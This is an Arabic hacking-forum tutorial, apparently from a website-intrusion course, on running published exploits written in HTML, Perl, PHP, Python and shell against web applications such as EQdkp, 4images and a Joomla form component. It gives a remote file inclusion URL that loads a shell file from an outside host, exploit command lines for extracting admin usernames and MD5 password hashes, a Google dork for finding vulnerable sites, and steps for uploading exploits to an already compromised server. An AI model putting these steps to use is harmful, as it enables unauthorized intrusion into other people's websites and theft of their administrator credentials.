عدد النقاط : 10
############################# استثمار التغرات المكتوبة بلغات برمجية .. ############################# ------------------------------------------------------------------------------------------------------------- في درس الثغرات خذنا استغلال ثغرات عاديه يعني ناخذ الاستغلال والدورك ونطبق . بعض الاحيان نلقى ثغرات يكون استغلالها بلغات برمجيه والاغلب تكون بهاللغات PHP , Perl , PythOn , Sh,HtmL وإن شاء الله سوف نشرح كل استثمار لكل ثغره بإذن الله ------------------------------------------------------------------------------------------------------------- استثمار الثغرات المكتوبة بالـ html الذي تبداً بـ <html> سوف يكون التطبيق على هده الثغرة http://www.milw0rm.com/exploits/3818 و هي موجودة في سكريبتthe merchant 2.2.0 ننسخ الاستغلال بالكامل ونضعه في المفكرة وعدل كود الشيل الى الشيل حقنا ونحفظه بامتداد الهتمل زي كذا exploit.html يطلعنلنا شكله زي كذا بعدين نحـطه في الـ c ونتسعـرضه من المتصفـح C:\exploit.html وأغلب الثغرآت المكتوبه بهذه اللغـه تكون نوعهآ remote file include والحين بعلمـكـم طريقـه .. عشآن تطلـع استغلآل لهذه الثغـرهـ مثلـن الحيـن لقيت موقـع مصـآب .. واستعرضت الشـل .. ركز مـعـي نحرر الصفحـه .. بالنوت بأد .. الاستغلال بيكون كذآ www.example.com/help/index.php?show=http://www.r3d-crew.com/hook.txt? / استثمار الثغرات المكتوبة بالـ Perl التـي تبدأ #!/usr/bin/perl يلـزمـك هذـآ البرنآـمـج مترجم ثغرات البيرل ActivePerl-5.8.7 حمله من الرابط هذا http://www.hack-mix.com/tools/ActivePerl-5.8.7.815.rar بنشرح الثغره على هذآ السكربت EQdkp 1.3.2 وهي من نوع Sql Injection رابط التغرة http://www.milw0rm.com/exploits/4030 ننسخ الثغره في مفكره ونحفظهآ بأمتدأد pl exploit.pl ونضعه في القـرص سـي C بعدين نتفـح الدوس أبدأ > تشغيل > cmd او من هنآ C:\WINDOWS\system32\cmd.exe بعدين نروح لمكآن الثغره في الـ c cd .. cd .. لين يطلع مكأنآ c:/ بعدين نشغل الثغره بالامر هذا perl perl exploit.pl لكي اسهل عليكم شرحتلكم بالصوره يكون التطبيق على الموقع المصاب كذا perl exploit.pl http://www.example.com/ وبيطلعلـك .. الادمن .. والباس مشفـر بمقيآس MD5 / وفيه طريقه ثانيه لاستثمار هذا النوع من الثغره دون تثبيت البرنامج بـأستخدـأم شل مرفوع على سيرفر لنكس ترفـع الثغره الى اي مجلد .. ويكون التطبيق بنفس الاوامر وفي مكان الاوامر ولازم يكون السيف مود اوف حتى تتمكن من تطبيق الاوامر perl exploit.pl http://www.example.com/ / استثمار الثغرات المكتوبة بالـPHP التي تبدأ بـ #!/usr/bin/php ويلزمك هذا البرنامج appserv السيرفر الشخصي حملوه من هذا الرابط http://prdownloads.sourceforge.net/appserv/appserv-win32-2.5.9.exe?download رابط الثغره : http://www.milw0rm.com/exploits/2487 ننسخ الثغره في مفكره ونحفظها بامتداد .php 4images.php ونضعه في الـ c ونفـتـح الدوس ونذهب لـمكآن الثغره زي ماتعلمـت اول ونشغل الثغره بهالامر [IMG]file:///C:/********s%20and%20Settings/mohd/سطح%20المكتب/دورة%20بسيطه%20لاختراق%20المواقع%20والسيرفرات/دروس%20الدورة/images/10.JPG[/IMG] نحصل على الاستغلال الي هو مقسم لقسمـين php 4images.php domain.com /4images/ 4images_ 1 php 4images.php domain.com /4images/ -d بدال كلمة domain.com تحط الموقع المصاب نحط الاستغلال الاول ثـم الثاني مع تغيير رابط الموقع المصاب ويطلعلنا باسورد الادمن مشفر بمقيآس الـ MD5 / استثمار الثغرات المكتوبة بالـ PythOn التي تبدأ #!/usr/bin/python يلزمك هذآ البرنآمج PythOn 2.4.3 مترجم ثغرات البايثون حمله من الرابط هذا http://www.python.org/ftp/python/2.4.3/python-2.4.3.msi ننسخ الثغره في مفكره ونحفظه بامتداد .py exploit.py ونحطه في الـc ثمـن نفـتح الدوس ونذهب لمكان الثغره كما تعودنا في الـ c ونشغل الثغره بهذي الطريقه exploit.py والاسغلال كذا exploit.pyhttp://domain/path http://domain/path << نبدله برابط الموقع المصاب مع تحديد مجلد السكربت / استثمار الثغرات المكتوبة بلغة الشيل التي تبدأ #!/bin/sh او #!/bin/bash ا يلزمكسرفر لنكس (ShellAccount or Root) لو كان في حوزتكم شل فلازم اكون يدعم الاتصال العكسي مثلن هذا الثغره http://www.milw0rm.com/exploits/4003 كود البحث في قوقل inurl:index.php?option=com_philaform تنسخ الثغره في مفكره وتحفظه بامتداد .sh exploit.sh ثم ترفعه على الشل ولازم ترفعه على مجلد تصريحه 777 ثم تصرح ملف 777 الثغره بالامر هذا chmod 777 exploit.sh ثمـن أمر التشغيل ./exploit.sh وبالتالي الاستغلال هو : exploit.sh www.example.com 2 http://www.example.com >> الموقع اللي مركب سكربت Joomla Component Phil-a-Form 2 >> الآي دي id حق الادمن وبتكون 2 افتراضيا وبيطلعلك اليوزر .. والباس مشفر
مازلت لا أفقهى شي ................ http://www.7ammil.com/data/visitors/...836[1].jpg Mr.AZOZ Email:hk-r@live.com